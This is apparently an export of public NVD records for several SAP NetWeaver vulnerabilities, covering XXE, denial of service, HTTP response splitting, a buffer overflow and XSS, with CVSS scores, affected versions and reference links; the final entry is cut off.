All the vulnerabilites related to sap - netweaver
Vulnerability from fkie_nvd
Published
2018-11-13 20:29
Modified
2024-11-21 04:03
Severity ?
Summary
Knowledge Management (XMLForms) in SAP NetWeaver, versions 7.30, 7.31, 7.40 and 7.50 does not sufficiently validate an XML document accepted from an untrusted source.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cna@sap.com | http://www.securityfocus.com/bid/105901 | Third Party Advisory, VDB Entry | |
| cna@sap.com | https://launchpad.support.sap.com/#/notes/2661740 | Permissions Required, Vendor Advisory | |
| cna@sap.com | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=503809832 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/105901 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | https://launchpad.support.sap.com/#/notes/2661740 | Permissions Required, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=503809832 | Vendor Advisory |
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"matchCriteriaId": "606EFE4F-57A4-44E2-A98D-F0867A658218",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.31:*:*:*:*:*:*:*",
"matchCriteriaId": "FECD5E96-7669-4747-80D2-27F95BF420BC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"matchCriteriaId": "F019F7F5-7740-4BD4-850F-D7A1923C6200",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
"matchCriteriaId": "F2B37045-2FB7-49BB-AE38-B84FAA6ADFB0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Knowledge Management (XMLForms) in SAP NetWeaver, versions 7.30, 7.31, 7.40 and 7.50 does not sufficiently validate an XML document accepted from an untrusted source."
},
{
"lang": "es",
"value": "Knowledge Management (XMLForms) en SAP NetWeaver, 7.30, 7.31, 7.40 y 7.50 no valida lo suficiente un documento XML aceptado de una fuente no fiable."
}
],
"id": "CVE-2018-2477",
"lastModified": "2024-11-21T04:03:53.270",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-11-13T20:29:00.420",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/105901"
},
{
"source": "cna@sap.com",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/2661740"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=503809832"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/105901"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/2661740"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=503809832"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-91"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2014-06-09 20:55
Modified
2024-11-21 02:09
Severity ?
Summary
The System Landscape Directory (SLD) in SAP NetWeaver allows remote attackers to modify information via vectors related to adding a system.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CB7AAA9B-5209-4419-87DA-8130843AD2AF",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The System Landscape Directory (SLD) in SAP NetWeaver allows remote attackers to modify information via vectors related to adding a system."
},
{
"lang": "es",
"value": "El componente System Landscape Directory (SLD) en SAP NetWeaver permite a atacantes remotos modificar informaci\u00f3n a trav\u00e9s de vectores relacionados con a\u00f1adir un sistema."
}
],
"id": "CVE-2014-4003",
"lastModified": "2024-11-21T02:09:18.790",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2014-06-09T20:55:08.497",
"references": [
{
"source": "cve@mitre.org",
"url": "http://packetstormsecurity.com/files/126986/SAP-SLD-Information-Tampering.html"
},
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"url": "http://seclists.org/fulldisclosure/2014/Jun/37"
},
{
"source": "cve@mitre.org",
"url": "http://secunia.com/advisories/58633"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/532331/100/0/threaded"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/67923"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1939334"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://packetstormsecurity.com/files/126986/SAP-SLD-Information-Tampering.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://seclists.org/fulldisclosure/2014/Jun/37"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://secunia.com/advisories/58633"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/532331/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/67923"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1939334"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-264"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2014-11-06 15:55
Modified
2024-11-21 02:03
Severity ?
Summary
The Standalone Enqueue Server in SAP Netweaver 7.20, 7.01, and earlier allows remote attackers to cause a denial of service (uncontrolled recursion and crash) via a trace level with a wildcard in the Trace Pattern.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "030B9858-1B22-4CE1-BAC7-1F574684C51C",
"versionEndIncluding": "7.01",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.20:*:*:*:*:*:*:*",
"matchCriteriaId": "53B11A3B-C559-428C-8946-7FD9FFBFA1BC",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The Standalone Enqueue Server in SAP Netweaver 7.20, 7.01, and earlier allows remote attackers to cause a denial of service (uncontrolled recursion and crash) via a trace level with a wildcard in the Trace Pattern."
},
{
"lang": "es",
"value": "El servidor Standalone Enqueue en SAP Netweaver 7.20, 7.01, y anteriores permite a atacantes remotos causar una denegaci\u00f3n de servicio (recursi\u00f3n sin control y ca\u00edda) a trav\u00e9s de un nivel de traza con un comod\u00edn en la pauta de traza (Trace Pattern)."
}
],
"id": "CVE-2014-0995",
"lastModified": "2024-11-21T02:03:11.250",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2014-11-06T15:55:06.990",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "http://blog.onapsis.com/analyzing-sap-security-notes-october-2014-edition/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/128726/SAP-Netweaver-Enqueue-Server-Trace-Pattern-Denial-Of-Service.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2014/Oct/76"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "http://secunia.com/advisories/60950"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/archive/1/533719/100/0/threaded"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/97610"
},
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "https://twitter.com/SAP_Gsupport/status/522750365780160513"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "http://blog.onapsis.com/analyzing-sap-security-notes-october-2014-edition/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/128726/SAP-Netweaver-Enqueue-Server-Trace-Pattern-Denial-Of-Service.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2014/Oct/76"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "http://secunia.com/advisories/60950"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/archive/1/533719/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/97610"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "https://twitter.com/SAP_Gsupport/status/522750365780160513"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2012-05-15 04:21
Modified
2024-11-21 01:39
Severity ?
Summary
The DiagTraceHex function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*",
"matchCriteriaId": "9FC1767F-10BD-468B-8D2B-538C82EB69B2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*",
"matchCriteriaId": "D04DC424-129B-448D-994B-7AC5D9B64703",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The DiagTraceHex function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet."
},
{
"lang": "es",
"value": "La funci\u00f3n de DiagTraceHex en disp+work.exe v7010.29.15.58313 y v7200.70.18.23869 en el distribuidor de la plataforma SAP NetWeaver 7.0 EHP1 y EHP2 permite a atacantes remotos causar una denegaci\u00f3n de servicio (ca\u00edda de demonio) a trav\u00e9s de un elaborado paquete SAP Diag."
}
],
"id": "CVE-2012-2612",
"lastModified": "2024-11-21T01:39:18.323",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2012-05-15T04:21:43.597",
"references": [
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"source": "cve@mitre.org",
"url": "http://www.securitytracker.com/id?1027052"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75452"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id?1027052"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75452"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1687910"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-02-12 20:15
Modified
2024-11-21 05:35
Severity ?
Summary
Under some circumstances the SAML SSO implementation in the SAP NetWeaver (SAP_BASIS versions 702, 730, 731, 740 and SAP ABAP Platform (SAP_BASIS versions 750, 751, 752, 753, 754), allows an attacker to include invalidated data in the HTTP response header sent to a Web user, leading to HTTP Response Splitting vulnerability.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cna@sap.com | https://launchpad.support.sap.com/#/notes/2880744 | Permissions Required, Vendor Advisory | |
| cna@sap.com | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://launchpad.support.sap.com/#/notes/2880744 | Permissions Required, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812 | Vendor Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sap | abap_platform | 7.50 | |
| sap | abap_platform | 7.51 | |
| sap | abap_platform | 7.52 | |
| sap | abap_platform | 7.53 | |
| sap | abap_platform | 7.54 | |
| sap | netweaver | 7.02 | |
| sap | netweaver | 7.30 | |
| sap | netweaver | 7.31 | |
| sap | netweaver | 7.40 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:abap_platform:7.50:*:*:*:*:*:*:*",
"matchCriteriaId": "A7AAA98F-50DD-4752-8D42-1E7B5B93BDB1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:abap_platform:7.51:*:*:*:*:*:*:*",
"matchCriteriaId": "1F7FC59C-72BB-4977-9003-DE65F9BE3361",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:abap_platform:7.52:*:*:*:*:*:*:*",
"matchCriteriaId": "143EB1D2-F62A-4223-9D3A-0CCBF75FEF2D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:abap_platform:7.53:*:*:*:*:*:*:*",
"matchCriteriaId": "688AE1F8-1A9D-4B2E-91DE-1E0010BE9DD9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:abap_platform:7.54:*:*:*:*:*:*:*",
"matchCriteriaId": "A643D231-9256-4325-9706-662EF80D0531",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.02:*:*:*:*:*:*:*",
"matchCriteriaId": "A9805246-77E5-456C-B7CF-07CFF2F9F069",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"matchCriteriaId": "606EFE4F-57A4-44E2-A98D-F0867A658218",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.31:*:*:*:*:*:*:*",
"matchCriteriaId": "FECD5E96-7669-4747-80D2-27F95BF420BC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"matchCriteriaId": "F019F7F5-7740-4BD4-850F-D7A1923C6200",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Under some circumstances the SAML SSO implementation in the SAP NetWeaver (SAP_BASIS versions 702, 730, 731, 740 and SAP ABAP Platform (SAP_BASIS versions 750, 751, 752, 753, 754), allows an attacker to include invalidated data in the HTTP response header sent to a Web user, leading to HTTP Response Splitting vulnerability."
},
{
"lang": "es",
"value": "En algunas circunstancias, la implementaci\u00f3n de SSO SAML en SAP NetWeaver (SAP_BASIS versiones 702, 730, 731, 740 y SAP ABAP Platform (SAP_BASIS versiones 750, 751, 752, 753, 754), permite a un atacante incluir datos invalidados en encabezado de respuesta HTTP enviado a un usuario Web, conllevando a una vulnerabilidad de Divisi\u00f3n de Respuesta HTTP."
}
],
"id": "CVE-2020-6181",
"lastModified": "2024-11-21T05:35:15.167",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "cna@sap.com",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-02-12T20:15:13.777",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/2880744"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/2880744"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-01-23 19:15
Modified
2024-11-21 01:49
Severity ?
Summary
A Buffer Overflow vulnerability exists in the Message Server service _MsJ2EE_AddStatistics() function when sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04, which could let a remote malicious user execute arbitrary code.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.01:sr1:*:*:*:*:*:*",
"matchCriteriaId": "5FAC1E9D-353F-4ADA-AF22-D2E14D927530",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.02:sp06:*:*:*:*:*:*",
"matchCriteriaId": "4A65157C-22CD-4B81-A830-BF878AD79421",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.30:sp04:*:*:*:*:*:*",
"matchCriteriaId": "AAB14187-850E-4CC6-8670-C03933CC768A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:2004s:*:*:*:*:*:*:*",
"matchCriteriaId": "EB3FC705-6497-44AE-A520-809D320C1380",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "A Buffer Overflow vulnerability exists in the Message Server service _MsJ2EE_AddStatistics() function when sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04, which could let a remote malicious user execute arbitrary code."
},
{
"lang": "es",
"value": "Se presenta una vulnerabilidad de Desbordamiento de B\u00fafer en la funci\u00f3n _MsJ2EE_AddStatistics() del servicio Message Server cuando se env\u00edan paquetes de SAP Message Server especialmente dise\u00f1ados hacia los puertos TCP remotos 36NN y/o 39NN en SAP NetWeaver 2004s, versiones 7.01 SR1, 7.02 SP06 y 7.30 SP04, lo que podr\u00eda permitir a un usuario malicioso remoto ejecutar c\u00f3digo arbitrario."
}
],
"id": "CVE-2013-1592",
"lastModified": "2024-11-21T01:49:56.880",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-01-23T19:15:11.327",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.exploit-db.com/exploits/24511"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/57956"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securitytracker.com/id/1028148"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82064"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://packetstormsecurity.com/files/cve/CVE-2013-1592"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.exploit-db.com/exploits/24511"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/57956"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securitytracker.com/id/1028148"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82064"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://packetstormsecurity.com/files/cve/CVE-2013-1592"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-120"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2021-10-12 15:15
Modified
2024-11-21 06:16
Severity ?
Summary
SAP NetWeaver - versions 700, 701, 702, 730, does not sufficiently encode user-controlled inputs, allowing an attacker to cause a potential victim to supply a malicious content to a vulnerable web application, which is then reflected to the victim and executed by the web browser, resulting in Cross-Site Scripting vulnerability.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cna@sap.com | https://launchpad.support.sap.com/#/notes/3084937 | Permissions Required | |
| cna@sap.com | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=587169983 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://launchpad.support.sap.com/#/notes/3084937 | Permissions Required | |
